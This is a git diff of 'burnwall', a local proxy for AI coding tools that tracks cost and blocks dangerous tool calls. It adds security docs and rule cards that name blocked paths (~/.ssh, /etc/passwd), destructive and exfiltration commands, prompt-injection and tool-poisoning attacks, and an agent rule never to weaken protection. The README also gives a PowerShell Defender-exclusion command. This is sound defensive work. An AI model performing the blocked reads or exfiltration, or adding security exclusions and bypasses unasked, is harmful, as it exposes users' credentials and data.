unattended scripted use, `--install-service` to opt in to + the supervisor. +- **Local pricing overrides** — drop a `~/.burnwall/pricing.toml` to override or + add model rates without waiting for a release. Entries take precedence over the + built-in rate card and handle date-suffixed model IDs automatically, so a + brand-new model can be priced immediately and a mid-cycle price change is a + two-line edit. This is the escape hatch the staleness warning always + advertised — now actually wired up. +- **`burnwall pricing` command** — `list` shows the effective rate card (built-in + plus overrides, with the source of each), `path [--init]` prints/scaffolds the + override file. +- **Signed remote pricing cards** — `burnwall pricing update` fetches a + `pricing.toml` from a URL (default: the latest GitHub release asset) and + installs it **only** if its detached Ed25519 signature verifies against a + trusted `[pricing].publishers` key — verify-before-parse, no fail-open. + `pricing sign` / `pricing verify` cover the publisher and offline-check sides, + reusing the same key format as `burnwall rules keygen`. Lets prices ship + between binary releases without giving up zero-trust. + +### Changed + +- **`burnwall init` output reworked** — dry-run output now lists the two actions + (routing + service) with the exact file paths and exports that would be + written. The legacy `append_to_rc` helper is kept (still used by tests) but + routing activation now goes through the new sourced env-file path. +- **`burnwall status`** — the stale-pricing warning now points at + `burnwall pricing path --init`, and an active-override count is shown (plus a + `pricing_override_count` field in `status --json`). + +## [0.9.3] — 2026-05-29 + +### Fixed + +- **Path/command security rules are now case- and separator-insensitive**, so an + access to `~/.SSH/id_rsa` — or a mixed `\`/`/` Windows path — can no longer slip + past a `~/.ssh` deny rule on case-insensitive filesystems (Windows, default macOS). +- **`start --daemon`** now forwards the `--upstream-google` and + `--rewrite-anthropic-cache` flags to the background process instead of dropping them. + +### Added + +- **Opt-in cost-spiral enforcement** — set `[loop_detection].cost_spiral_enforce = true` + to block the next request once rolling spend exceeds `max_cost_per_window`. Off by + default; detection still logs a warning regardless. +- **Optional build features** (`audit`, `mcp`, `observe`, `logscrape`, `waste`), all on + by default so the shipped binary is unchanged. `cargo build --no-default-features` + now produces a lean core-proxy build (cost + security + budget + storage). + +### Changed + +- **Migrated to the Rust 2024 edition** with a declared minimum supported Rust version, + and moved lint policy into `Cargo.toml`. +- **SQLite hardening** — WAL journal mode and a busy-timeout, plus response-path writes + now run off the async runtime so the proxy never stalls on disk I/O. + ## [0.9.2] — 2026-05-28 ### Added diff --git a/CLAUDE.md b/CLAUDE.md index 2c9fe9e..8c924db 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -77,6 +77,8 @@ src/ handler.rs — Request/response handler pipeline forwarding.rs — Forward requests to upstream providers streaming.rs — SSE/streaming response handling + cache_injection.rs — Optional Anthropic cache_control rewrite + savings projection + resilience.rs — Same-model endpoint failover + circuit breaking providers/ mod.rs — Provider trait and registry anthropic.rs — Anthropic Messages API parser @@ -105,6 +107,7 @@ src/ config/ mod.rs — TOML config loading and defaults types.rs — Config struct definitions + project.rs — Per-project .burnwall.yaml profile discovery + merge cli/ mod.rs — CLI command definitions start.rs — `burnwall start` command @@ -113,12 +116,17 @@ src/ history.rs — `burnwall history` command config_cmd.rs — `burnwall config` command (incl. `config doctor`) init.rs — `burnwall init` (auto-detect + setup) + daemon.rs — Background spawn + liveness/PID-file (used by `start --daemon`/`stop`) + security.rs — `burnwall security` (rule inspection / scan testing) + completions.rs — `burnwall completions` (shell completion scripts) mcp.rs / mcp_watch.rs — `burnwall mcp*` (approvals, audit export, watcher) waste.rs / explore.rs / metrics.rs / digest.rs — insight + observability cmds + cost_per_pr.rs — `burnwall cost-per-pr` (git-attributed spend) rules.rs — `burnwall rules` (install/add/test/sign/verify/fetch) audit.rs / report.rs — `burnwall audit` (seal/verify/aibom/sarif) + `report` observe/ — Local, metadata-only observability metrics.rs / otel.rs / digest.rs — latency p50/p95, OTel span sink, AIBOM digest + attribution.rs — git branch/commit cost attribution mcp/ — MCP firewall + multi-server watcher mod.rs / firewall.rs — routing, tool-poisoning + rug-pull detection audit/ — Cryptographic audit + compliance exports @@ -197,7 +205,7 @@ Scan `tool_use` / `function_call` blocks in the REQUEST body (before forwarding) ## Important Notes for Claude Code Sessions -- Read `docs/SPEC.md` for exact CLI behavior and output formats +- Run `burnwall --help` and read `README.md` for current CLI behavior and output formats - Read `docs/ARCHITECTURE.md` for component design and data flow - Work in focused, scoped sessions — one component at a time - Write tests FIRST for any new parser or calculator logic diff --git a/Cargo.lock b/Cargo.lock index c802108..2221f94 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -171,7 +171,7 @@ checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb" [[package]] name = "burnwall" -version = "0.9.2" +version = "0.11.0" dependencies = [ "anyhow", "assert_cmd", diff --git a/Cargo.toml b/Cargo.toml index 710c1b2..bc7a385 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,7 +1,8 @@ [package] name = "burnwall" -version = "0.9.2" -edition = "2021" +version = "0.11.0" +edition = "2024" +rust-version = "1.87" description = "Local proxy for AI coding tools (Claude Code, Codex CLI, Aider): cache-aware cost tracking, path/command security checks, daily budget enforcement. Zero telemetry." # FSL-1.1-MIT is not an SPDX identifier; crates.io rejects it as `license`, # so the license is declared via the file instead. @@ -19,13 +20,34 @@ path-guid = "1B65F07B-49F5-469A-AF2C-8C091A57035A" license = false eula = false +# Optional feature clusters layered on top of the core proxy (cost + security +# + budget + storage). All on by default so the shipped binary is unchanged; +# `--no-default-features` builds the lean core. Implication edges mirror the +# module graph: audit→observe→logscrape and waste→logscrape. +[features] +default = ["audit", "mcp", "observe", "logscrape", "waste"] +logscrape = [] +observe = ["logscrape"] +waste = ["logscrape"] +audit = ["observe"] +mcp = [] + +# Lint policy lives here (not as crate-wide `#![allow]`) so it is visible and +# reviewable. `unused` stays a warning rather than being silenced wholesale. +[lints.rust] +unused = "warn" +rust_2018_idioms = "warn" + +[lints.clippy] +all = "warn" + [dependencies] # Async runtime tokio = { version = "1", features = ["full"] } # HTTP proxy hyper = { version = "1", features = ["full"] } -hyper-util = { version = "0.1", features = ["tokio", "server-auto", "http1", "http2"] } +hyper-util = { version = "0.1", features = ["tokio", "server-auto", "server-graceful", "http1", "http2"] } http-body-util = "0.1" tower = { version = "0.5", features = ["util"] } @@ -81,11 +103,18 @@ tempfile = "3" wiremock = "0.6" # Mock HTTP server for integration tests assert_cmd = "2" # CLI testing predicates = "3" # Assertion helpers +dashmap = "6" # Construct WatchState literals in tests [[test]] name = "proxy_test" path = "tests/integration/proxy_test.rs" +# Own binary (= own process): proxy_test flips the process-global +# BURNWALL_BYPASS env var, which would race the pause/allow-once assertions. +[[test]] +name = "pause_test" +path = "tests/integration/pause_test.rs" + [[test]] name = "parser_test" path = "tests/unit/parser_test.rs" @@ -94,6 +123,10 @@ path = "tests/unit/parser_test.rs" name = "pricing_test" path = "tests/unit/pricing_test.rs" +[[test]] +name = "tls_integrity_test" +path = "tests/unit/tls_integrity_test.rs" + [[test]] name = "storage_test" path = "tests/unit/storage_test.rs" @@ -174,10 +207,22 @@ path = "tests/unit/waste_test.rs" name = "observe_test" path = "tests/unit/observe_test.rs" +[[test]] +name = "cost_export_test" +path = "tests/unit/cost_export_test.rs" + [[test]] name = "audit_cli_test" path = "tests/integration/audit_cli_test.rs" +[[test]] +name = "audit_test" +path = "tests/unit/audit_test.rs" + +[[test]] +name = "torture_test" +path = "tests/integration/torture_test.rs" + [profile.release] opt-level = "z" # Optimize for size lto = true # Link-time optimization diff --git a/README.md b/README.md index 1ee93c6..39a6e87 100644 --- a/README.md +++ b/README.md @@ -87,9 +87,10 @@ Works on macOS (arm64 + x86_64) and Linuxbrew. Prebuilt archives for every release are at : -- `burnwall-aarch64-apple-darwin.tar.gz` — macOS Apple Silicon -- `burnwall-x86_64-apple-darwin.tar.gz` — macOS Intel -- `burnwall-x86_64-unknown-linux-gnu.tar.gz` — Linux x86_64 +- `burnwall-aarch64-apple-darwin.tar.xz` — macOS Apple Silicon +- `burnwall-x86_64-apple-darwin.tar.xz` — macOS Intel +- `burnwall-aarch64-unknown-linux-gnu.tar.xz` — Linux arm64 +- `burnwall-x86_64-unknown-linux-gnu.tar.xz` — Linux x86_64 - `burnwall-x86_64-pc-windows-msvc.zip` — Windows x86_64 Extract and put the `burnwall` binary anywhere on your `PATH`. @@ -101,6 +102,49 @@ cargo install burnwall # from crates.io git clone https://github.com/intbot/burnwall && cd burnwall && cargo build --release # from source ``` +### Verify your download + +Every release binary carries a GitHub Artifact Attestation (Sigstore keyless +build provenance, SLSA Build L2) — proof it was built from this repo's CI, not +swapped out. Verify before trusting a binary in your traffic path: + +```bash +gh attestation verify burnwall-x86_64-unknown-linux-gnu.tar.xz --repo intbot/burnwall +``` + +Each release also ships per-file `.sha256` checksums and a combined `sha256.sum`: + +```bash +sha256sum --ignore-missing -c sha256.sum +``` + +See [`SECURITY.md`](SECURITY.md) for the full integrity + TLS-handling statement. + +### Windows: if Defender or SmartScreen flags it + +The release binaries aren't code-signed yet, so Windows SmartScreen may show an +"unknown publisher" prompt on first run, and Defender's machine-learning +heuristic can occasionally flag the binary as a false positive — ironically, +partly *because* a local security proxy looks structurally like the things it +protects against. It's a false positive; the binary is the one built by this +repo's CI (verify it with the attestation command above). + +If Defender quarantines the binary while the proxy is running, your AI tools may +start failing with `ConnectionRefused` (they're still pointed at the now-gone +local proxy). To recover: + +``` +burnwall recover # pauses routing so new terminals go direct, and tells you what to restart +``` + +To prevent re-quarantine, exclude Burnwall's directory in an elevated PowerShell: + +```powershell +Add-MpPreference -ExclusionPath "$env:USERPROFILE\.burnwall" +``` + +You can report the false positive to Microsoft at . + ## How It Works Burnwall runs as a local HTTP proxy. You point your AI tools at it via environment variables: @@ -123,11 +167,32 @@ Every API call flows through Burnwall: Responses are **never modified** — Burnwall reads them, logs the cost, and passes them through unchanged. +### Defense-in-depth, not a silver bullet + +Security rules are evaluated **before the request leaves your machine** — a +blocked request never reaches the provider. That's the point: it's another layer +that holds even when a tool's own approval prompt, allowlist, or sandbox is +bypassed (and those have been, repeatedly). Burnwall doesn't claim you're under +attack; it claims that *if* a prompt-injected agent tries to read `~/.ssh` or +pipe a secret to the network, the rule fires locally first. Pair it with your +tool's native controls — it's designed to complement them, not replace them. + ## Scope: What Burnwall Guards Burnwall sits on the **LLM API path** — the HTTP traffic between your AI tool and Anthropic/OpenAI. Security scanning, budget enforcement, and cost tracking all operate on that traffic. -It does **not** intercept **MCP** (Model Context Protocol) traffic. When your agent calls an MCP server's tools, that traffic flows through your AI tool directly — Burnwall never sees it, so it can't scan or block it. MCP-layer protection is a separate concern; dedicated MCP-firewall tools exist and run cleanly alongside Burnwall. +The LLM-path proxy does **not** automatically see **MCP** (Model Context Protocol) traffic — that flows from your AI tool to MCP servers directly. For that layer, Burnwall ships a dedicated **MCP firewall** you put in front of your MCP servers (`burnwall mcp-watch`): it detects tool-poisoning and "rug-pull" (silent post-approval redefinition) attacks and enforces an approval workflow. Run it alongside the main proxy for end-to-end coverage. + +### The coverage boundary + +Burnwall protects the traffic that **flows through it**. It does not man-in-the-middle TLS — it forwards via base-URL routing — so a tool that talks to a provider over a path the base URL can't redirect is simply not visible to it. By design, no proxy that avoids TLS interception can see that traffic. + +In practice: + +- **Routable, fully protected:** Claude Code (including on a Pro/Max subscription), Codex CLI in **API-key mode**, Aider, OpenCode, and other tools that honor `ANTHROPIC_BASE_URL` / `OPENAI_BASE_URL` or an equivalent API-base setting. +- **Not routable, bypasses entirely:** Codex CLI signed in with **ChatGPT login**, which talks to the ChatGPT backend over OAuth. Codex in **API-key mode** routes through Burnwall and can be protected — but it bills per-token instead of your flat subscription, so weigh the cost trade-off before switching. + +So you're never left guessing, Burnwall tells you which of your installed tools are actually behind the firewall: `burnwall init` warns at setup if a tool is in a bypassing mode, and `burnwall status` (and `burnwall watch`) show a per-tool **Coverage** readout — *protected*, *installed but unseen*, or *bypasses*. ## Supported Tools @@ -135,6 +200,7 @@ It does **not** intercept **MCP** (Model Context Protocol) traffic. When your ag |------|---------|---------------| | Claude Code | ✅ Full | `ANTHROPIC_BASE_URL` | | Codex CLI (API key mode) | ✅ Full | `OPENAI_BASE_URL` | +| Codex CLI (ChatGPT login) | ❌ | Not interceptable (OAuth backend) | | Aider | ✅ Full | `--openai-api-base` | | OpenCode | ✅ Full | Settings | | Cline | ✅ Full | Extension settings | @@ -163,6 +229,23 @@ When a rule triggers: Request returned 403 — file was never accessed. ``` +### False positives + +Every block explains what matched and why, and points at the escape hatches — +all of which take effect on the **running** proxy, with no restart of the proxy +or your AI tool (your agent session survives): + +```bash +burnwall allow-once # let just the NEXT request through, then auto-restore +burnwall pause 5m # relay everything unchecked for a bounded window +burnwall resume # restore protection early +burnwall report-bug # write a sanitized local report (nothing is sent) +``` + +Pauses auto-expire (default 5 minutes, capped at 24 hours) and every status +surface shows a loud `⏸ PAUSED` warning for the whole window — the escape +hatch can't silently outlive the emergency. + ## Cost Output ``` @@ -182,13 +265,26 @@ $ burnwall status Cache savings today: $47.82 ``` -## Privacy +## Trust & privacy + +Burnwall sits in your API traffic path, so it earns that position by being +verifiable, not by asking for trust: -- **100% local.** No data ever leaves your machine (except API forwarding). +- **100% local.** No data ever leaves your machine except the API forwarding you + asked for. Works offline (apart from the forwarding itself). - **Zero telemetry.** No analytics, no phone-home, no tracking. Ever. - **No prompt logging.** Only metadata is stored (model, tokens, cost, timestamp). - **No API key storage.** Keys pass through in headers and are never written to disk. -- **Open source.** Audit the code yourself. +- **Your data, portable.** All metadata lives in a single SQLite file under + `~/.burnwall` (`burnwall.db`). Back it up by copying that one file; export it + any time with `burnwall export --format csv|json`. See + [docs/TROUBLESHOOTING.md](docs/TROUBLESHOOTING.md). +- **Read-only on responses.** Burnwall inspects responses to compute cost and + **never modifies them** — your tool gets the provider's bytes unchanged. +- **Single binary, signed releases.** Install from a checksummed, signed release + (or `cargo install` from source). No background services you didn't ask for. +- **Open source.** The "no network calls except forwarding" claim is auditable — + read the proxy code yourself. ## Terms of service diff --git a/SECURITY.md b/SECURITY.md new file mode 100644 index 0000000..2c1e191 --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,66 @@ +# Security + +Burnwall sits in your AI API traffic path, so its own integrity matters as much +as the rules it enforces. This document states what we do to be verifiable, how +TLS is handled, and how to report a vulnerability. + +## Reporting a vulnerability + +Please report security issues privately via GitHub Security Advisories +("Report a vulnerability" on the repository's Security tab) rather than a public +issue. We aim to acknowledge within a few days. + +## Self-integrity: verify what you run + +- **Build provenance (SLSA Build L2).** Every released binary carries a GitHub + Artifact Attestation — Sigstore keyless provenance proving it was built from + this repository's CI. There is no long-lived signing key to leak. + ```bash + gh attestation verify burnwall-x86_64-unknown-linux-gnu.tar.xz --repo intbot/burnwall + ``` +- **Checksums.** Each release ships per-file `.sha256` and a combined + `sha256.sum`: + ```bash + sha256sum --ignore-missing -c sha256.sum + ``` +- **Supply-chain hygiene.** The repository runs OpenSSF Scorecard in CI. The + install one-liners are served over HTTPS only; package-manager installs + (Homebrew, `cargo install`, `cargo binstall`) are the recommended trusted + paths, and the npm wrapper publishes with provenance when that channel is + enabled. +- **Open source.** The proxy, scanner, and pricing logic are auditable — the + "no network calls except forwarding" claim below can be checked in the code. + +## How Burnwall handles your traffic (TLS & data) + +A proxy that terminates or weakens TLS would be a liability. Burnwall does not: + +- **TLS is validated, never weakened.** Upstream connections use `rustls` + (`rustls-tls`, with native-TLS disabled) and validate the provider's + certificate like a browser would. Burnwall never disables certificate + validation (no `danger_accept_invalid_certs`) and never injects or installs a + root CA. There is a guard test (`tests/unit/tls_integrity_test.rs`) asserting + these never appear in the source. +- **Responses are read-only.** Burnwall inspects responses to compute cost and + **never modifies them** — your tool receives the provider's bytes unchanged. +- **No plaintext secrets at rest.** API keys pass through in headers and are + never written to disk. Prompt/response **content is never logged** — only + metadata (model, token counts, cost, timestamp). +- **Local only, zero telemetry.** No data leaves your machine except the API + forwarding you configured. No analytics, no phone-home. +- **Fail-open.** If a request body can't be parsed, Burnwall forwards it rather + than break your workflow — it never silently drops your traffic. + +## Kill switch + +If anything ever misbehaves, `burnwall pause` flips the *running* proxy into a +pure relay (no scanning, no budget checks, no storage) and auto-restores after +5 minutes — `burnwall resume` restores it early, and `burnwall allow-once` +relays just the next request. `burnwall self-rollback ` reinstalls a +prior release. + +## Scope + +Burnwall reduces risk; it is not a guarantee. Run it as one layer of +defense-in-depth alongside your tool's native permissions/sandbox and least- +privilege credentials — not as a replacement for them. diff --git a/dist-workspace.toml b/dist-workspace.toml index 9ec30e3..ec29791 100644 --- a/dist-workspace.toml +++ b/dist-workspace.toml @@ -20,6 +20,14 @@ ci = "github" # npm -> an npm package using the esbuild optionalDependencies layout # msi -> a native Windows installer installers = ["shell", "powershell", "homebrew", "npm", "msi"] +# Install to the SAME directory the hand-written README installer (install.ps1 +# / install.sh) uses and persists on PATH (L-C3). Without this, cargo-dist +# defaults to $CARGO_HOME/bin, so `burnwall upgrade` (which runs the dist +# installer) wrote the new binary to a *different* dir than the running one — +# leaving the restart pointed at the old path, a second PATH entry, and an +# autostart Run-key aimed at a now-stale exe. One canonical dir removes the +# whole class. +install-path = "~/.burnwall/bin" # Target platforms to build apps for (Rust target-triple syntax) targets = ["aarch64-apple-darwin", "aarch64-unknown-linux-gnu", "x86_64-apple-darwin", "x86_64-unknown-linux-gnu", "x86_64-pc-windows-msvc"] # Where the Homebrew formula is published (the existing tap repo). @@ -36,3 +44,20 @@ tap = "intbot/homebrew-burnwall" publish-jobs = ["./publish-crates", "./publish-nuget", "./publish-pypi"] # Run a plan-only check on PRs (don't try to build/publish on every PR). pr-run-mode = "plan" +# `release.yml` carries a manual patch over the dist-generated workflow (the +# attestation-retry block — re-apply after any `dist generate`). Without this, +# dist's CI-consistency guard fails `plan` because the committed workflow no +# longer matches what dist would emit. Scope is "ci" only, so every other file +# is still checked for drift. +allow-dirty = ["ci"] +# Generate GitHub Artifact Attestations (Sigstore keyless build provenance, +# SLSA Build L2). Every released binary can then be verified with +# `gh attestation verify --repo intbot/burnwall`. No signing key to +# manage — a security tool should be exemplary about its own integrity. +github-attestations = true +# Code signing is NOT wired yet — unsigned releases can trip Windows Defender / +# SmartScreen and macOS Gatekeeper. The procurement + CI plan (Azure Artifact +# Signing for Windows, Apple Developer ID + notarization for macOS) lives in +# internal/SIGNING.md. Signing must integrate through cargo-dist's codesign hook +# so the SIGNED binary is the one hashed + attested — a post-hoc re-sign would +# break the published checksums and `gh attestation verify`. diff --git a/docs/ARCHITECTURE.md b/docs/ARCHITECTURE.md index ea313ef..d237931 100644 --- a/docs/ARCHITECTURE.md +++ b/docs/ARCHITECTURE.md @@ -150,7 +150,11 @@ The security engine scans the JSON request body before forwarding. It does NOT n } ``` -The scanner does a deep traversal of the JSON looking for string values that match deny patterns. It doesn't need to know which field is which — any string value containing a denied path or command triggers a block. +The scanner does a deep traversal of the JSON looking for string values that match deny patterns. On the LLM proxy path it is **context-aware**: command-shaped rules (denied paths, denied commands, network mounts, destructive commands, exfil techniques) apply only inside tool-call argument subtrees — Anthropic `tool_use.input`, OpenAI `tool_calls` / `function_call` arguments, Gemini `functionCall`. Prose (the system prompt, chat text, tool definitions, tool results) can legitimately *mention* `~/.ssh` or `rm -rf` — project docs describing a deny list, a conversation about backups — and must not be blocked for it. Data-shaped rules (secret detection, DLP) still apply to **every** string leaf, since a credential or card number is worth blocking wherever it sits in the payload. + +Within a conversation, command-shaped rules are further scoped to the **latest assistant turn's in-flight tool round** (the trailing assistant message followed only by tool results). Clients resend the full history on every request, so scanning older turns would make one correctly-blocked call re-trigger the 403 forever. The request that carries the dangerous call and its output is blocked — that is the moment the forbidden read's content would leave the machine — but once the user sends a new message the round is adjudicated and the conversation recovers. + +MCP `tools/call` bodies keep the strict whole-body semantics: there, the entire payload *is* a tool invocation, so any string value containing a denied path or command triggers a block. ### Pattern Matching Strategy: - **Path matching:** Expand `~` to actual home dir, normalize paths, check against deny list diff --git a/docs/INTEGRATIONS.md b/docs/INTEGRATIONS.md index 5352ee5..09adaca 100644 --- a/docs/INTEGRATIONS.md +++ b/docs/INTEGRATIONS.md @@ -53,6 +53,18 @@ burnwall start --upstream-openai https://your-gateway.example/v1 burnwall start --upstream-anthropic https://your-upstream.example ``` +To make the chain permanent (no flag on every start), set it in config instead: + +``` +burnwall config set upstreams.openai https://your-gateway.example/v1 +burnwall config set upstreams.anthropic https://your-upstream.example +# back to the provider's own API: +burnwall config set upstreams.openai "" +``` + +A `--upstream-*` flag passed to `burnwall start` still wins over the config value +for that run. + The upstream URL is **your config**, not something a request can change. Burnwall forwards your request unchanged and adds, on the local side: blocking dangerous file-path / command / secret-exfiltration tool calls before they leave the machine, @@ -63,4 +75,64 @@ across every tool — none of which a hosted router can do for you. If you run more than one base URL for a provider, configure `[resilience]` so Burnwall retries the same request against the next endpoint on a connection error -or 5xx. See `docs/SPEC.md`. +or 5xx. Run `burnwall config show` to see the `[resilience]` section. + +## Teach your agent about Burnwall (skills) + +Coding agents work better with the firewall when they understand it. One command +installs a short, burnwall-owned guide where your agent discovers it: + +``` +burnwall skills install # Claude Code + Codex (whichever are present) +burnwall skills show # print the guide without writing anything +burnwall skills uninstall # remove it cleanly +``` + +- **Claude Code** gets `~/.claude/skills/burnwall/SKILL.md` — new sessions pick + it up automatically. +- **Codex CLI** gets a marker-delimited section in `~/.codex/AGENTS.md`; + reinstalls replace it in place and never touch your own content. + +With the guide installed, the agent can answer spend and budget questions from +`burnwall status --json`, explain a security block by reading the block message +and `burnwall security --json`, and run `burnwall scan` on config files. The +guide's one hard rule: the agent must **never weaken protection itself** — no +`allow-once`, no `pause`, no security config edits. Anything state-changing is +suggested to you, never run. A blocked request may be exactly the action +Burnwall exists to stop, so that call stays human-only. + +## Scan agent configs in CI (GitHub Action) + +`burnwall scan` is a **file mode** — no proxy, no live traffic. It checks agent +instruction files (`CLAUDE.md`, `.cursorrules`, `.mcp.json`, anything under +`.claude/` and friends) for two high-confidence problems: + +- a **committed credential** (a real key pattern in a tracked file), and +- **invisible Unicode characters** hidden inside ASCII text — the way hidden + instructions get smuggled into agent config files via an innocent-looking PR. + +Prose that merely *mentions* a dangerous command or sensitive path is never +flagged — config files are documentation, and Burnwall only reports what it is +confident about. + +One step in any workflow uploads findings to the repository's Security tab: + +```yaml +permissions: + security-events: write # for the SARIF upload +steps: + - uses: actions/checkout@v4 + - uses: intbot/burnwall/.github/actions/burnwall-scan@main +``` + +Inputs: `paths` (default `.`), `all-files` (scan every text file, default +`false`), `fail-on-findings` (also fail the job, default `false`), +`upload-sarif` (default `true`), `burnwall-version` (default `latest`). + +Locally, the same scan runs as: + +``` +burnwall scan # agent configs under the current directory +burnwall scan path/to/repo --all-files --fail-on-findings +burnwall scan --sarif report.sarif # SARIF 2.1.0 for any code-scanning tool +``` diff --git a/docs/MCP_REGISTRY.md b/docs/MCP_REGISTRY.md index 6afeb4e..5d7d702 100644 --- a/docs/MCP_REGISTRY.md +++ b/docs/MCP_REGISTRY.md @@ -14,8 +14,8 @@ burnwall mcp-watch --upstream [--port 4101] [--require-app Point your MCP client at the watcher's local address instead of the upstream directly. Multiple servers can be fronted via `[[mcp.servers]]` in -`~/.burnwall/config.toml`; auto-approve/deny globs go under `[mcp]` (see -`docs/SPEC.md`). +`~/.burnwall/config.toml`; auto-approve/deny globs go under `[mcp]` (run +`burnwall config show` to see the current MCP section). ## Registry manifest diff --git a/docs/RULES.md b/docs/RULES.md new file mode 100644 index 0000000..b12f57a --- /dev/null +++ b/docs/RULES.md @@ -0,0 +1,127 @@ +# Security rules + +Every block Burnwall raises has a stable **rule id** (the same token you see in +`burnwall security`, in logs, and in an `x-burnwall-blocked` header). This page +is the reference for what each rule guards against and how to proceed when it's +a false positive. + +You don't need this page to get an answer in the moment — the CLI carries the +same text: + +```bash +burnwall security --days 7 # list recent blocks and their ids +burnwall explain # what fired, why, and how to proceed +``` + +Each rule below is anchored by its id, so a `/rules/` reference resolves to +the matching `#` section here. + +When something is a genuine false positive, the escape hatches all act on the +**running** proxy — no restart of the proxy or your AI tool: + +```bash +burnwall allow-once # let just the NEXT request through, then auto-restore +burnwall pause 5m # relay everything unchecked for a bounded window +``` + +--- + +## canary_triggered +**Canary tripwire fired** + +- **Why:** A credential you planted as bait (`security.canaries`) appeared in an + outbound payload. It has no legitimate use, so any request carrying it is an + exfiltration signal. +- **How to proceed:** This is almost never a false positive. If you deliberately + sent the canary, remove it from `security.canaries` or run the one call with + `burnwall allow-once`. + +## destructive_blocked +**Catastrophic command** + +- **Why:** A tool call carried a data-loss-grade command (recursive force-delete, + disk wipe, destructive SQL), detected by shape rather than a literal string. +- **How to proceed:** If you really intend it, narrow the command, or allow the + single call with `burnwall allow-once`. Prefer scoping the destructive action + to an explicit path. + +## exfil_blocked +**Data-exfiltration technique** + +- **Why:** A tool call matched a command-shaped exfiltration pattern (e.g. a + secret piped to the network, DNS exfiltration). +- **How to proceed:** If the network call is legitimate, run it outside the agent + or use `burnwall allow-once` for the single request. Review what was being sent + first. + +## secret_detected +**Secret / credential in payload** + +- **Why:** The request body contained something matching a known credential + pattern (API key, token, private-key header). Sending it to a model would leak + it. +- **How to proceed:** Remove the credential from what the agent is about to send. + If it is a false positive (a fake/example key), allow the single call with + `burnwall allow-once`. + +## dlp_blocked +**PII / data exfiltration** + +- **Why:** The payload matched a data-loss pattern (card number, SSN). This is + egress/DLP protection against sensitive data leaving in a prompt. +- **How to proceed:** Strip the sensitive value, or allow the single call with + `burnwall allow-once` if it is test data. Consider whether the value belongs in + a prompt at all. + +## misdirection_blocked +**Credential sent to the wrong provider** + +- **Why:** A recognized provider credential was being forwarded to a different + provider's endpoint (e.g. an OpenAI key in a body bound for the Anthropic + upstream). +- **How to proceed:** Point the tool at the correct provider, or disable + `security.block_credential_misdirection` if this routing is intentional. + +## obfuscation_blocked +**Invisible-character obfuscation** + +- **Why:** A tool-call argument was dense with zero-width / invisible Unicode — + content being hidden from filters and from your own review (instruction + smuggling). +- **How to proceed:** Inspect the source of the tool call; this usually means a + poisoned input. Only `allow-once` if you understand why the hidden characters + are there. + +## command_blocked +**Dangerous command** + +- **Why:** A tool call tried to run a command on the deny list (e.g. `chmod 777`, + a fork bomb, `curl` to an unknown host). +- **How to proceed:** Adjust the command, relax the rule in config if it is a + legitimate workflow, or `burnwall allow-once` for the single call. + +## path_blocked +**Denied-path access** + +- **Why:** A tool call referenced a protected path (`~/.ssh`, `~/.aws`, + `/etc/passwd`, …). Reading or writing it from an agent is how credentials and + keys leak. +- **How to proceed:** If the access is intended and safe, allow the single call + with `burnwall allow-once`, or remove the path from the deny list in config. + +## mount_blocked +**Network-mount access** + +- **Why:** A tool call touched a network mount (`/Volumes/`, an SMB/NFS share). + Agent access to network storage is a common data-egress path. +- **How to proceed:** Copy what you need locally, or allow the single call with + `burnwall allow-once` if the mount access is deliberate. + +--- + +## Anything else + +An id Burnwall doesn't have a specific card for (a newer rule, or one authored +in a rule pack) falls back to a generic block. Run `burnwall security --days 7` +to see recent blocks, or `burnwall allow-once` to let the next request through +unchecked. diff --git a/docs/SPEC.md b/docs/SPEC.md deleted file mode 100644 index 61af253..0000000 --- a/docs/SPEC.md +++ /dev/null @@ -1,612 +0,0 @@ -# Burnwall Specification - -## Scope - -This spec describes Burnwall's CLI commands, proxy behavior, security engine, -and storage schema. - ---- - -## CLI Commands - -### `burnwall init` - -Auto-detect installed AI tools and configure environment variables. - -``` -$ burnwall init - -🔍 Detecting AI tools... - ✓ Claude Code found - ✓ Codex CLI found - ✗ Aider not found - -🔧 Configuring environment... - → Added ANTHROPIC_BASE_URL=http://localhost:4100/anthropic to ~/.zshrc - → Added OPENAI_BASE_URL=http://localhost:4100/openai to ~/.zshrc - -🛡️ Default security rules applied: - → Blocking access to: ~/.ssh, ~/.aws, ~/.gnupg, ~/.kube - → Blocking commands: rm -rf /, chmod 777 - -💰 Default budget: $50/day (change with `burnwall config set budget.daily `) - -✅ Setup complete. Run `source ~/.zshrc` then `burnwall start`. - -What's your primary goal? - [1] Track AI costs - [2] Set budget limits - [3] Security / access control - [4] All of the above -> (stored locally in ~/.burnwall/config.toml, never sent anywhere) -``` - -**Detection logic:** -- Claude Code: check if `claude` binary exists in PATH -- Codex CLI: check if `codex` binary exists in PATH -- Aider: check if `aider` binary exists in PATH -- OpenCode: check if `opencode` binary exists in PATH - -**Shell detection:** -- Check `$SHELL` env var -- Support: zsh (~/.zshrc), bash (~/.bashrc), fish (~/.config/fish/config.fish) -- On Windows: set system environment variables via PowerShell - -### `burnwall start` - -Start the proxy daemon. - -``` -$ burnwall start - -🛡️ Burnwall v0.1.0 - Proxy: http://localhost:4100 - Config: ~/.burnwall/config.toml - Database: ~/.burnwall/burnwall.db - - Routes: - /anthropic/* → api.anthropic.com - /openai/* → api.openai.com - - Security: 4 deny rules active - Budget: $50.00/day - - Ready. All API calls are being tracked. -``` - -**Behavior:** -- Starts HTTP server on `localhost:4100` (configurable via `--port`) -- Runs in foreground by default -- `--daemon` flag runs as background process, writes PID to `~/.burnwall/burnwall.pid` -- Exits gracefully on SIGINT/SIGTERM -- If port is already in use, print helpful error message - -### `burnwall stop` - -Stop the background proxy daemon. - -``` -$ burnwall stop -Stopped Burnwall (PID 12345). -``` - -### `burnwall status` - -Show current spend summary. - -``` -$ burnwall status - -📊 Today (May 11, 2026) - Total: $12.47 across 84 requests - - Provider / Model Cost Requests Cache Hit - ───────────────────────────────────────────────────────────────── - anthropic/claude-sonnet-4-6 $8.20 62 73% - anthropic/claude-haiku-4-5 $0.92 18 91% - openai/gpt-5.4 $3.35 4 45% - - 💰 Budget: $12.47 / $50.00 (24.9%) - 🛡️ Security: 2 blocked attempts - 🔄 Loops: 1 detected and killed - - Cache savings today: $47.82 - (without caching, today would have cost $60.29) -``` - -**Data source:** Query SQLite for today's records, grouped by provider+model. - 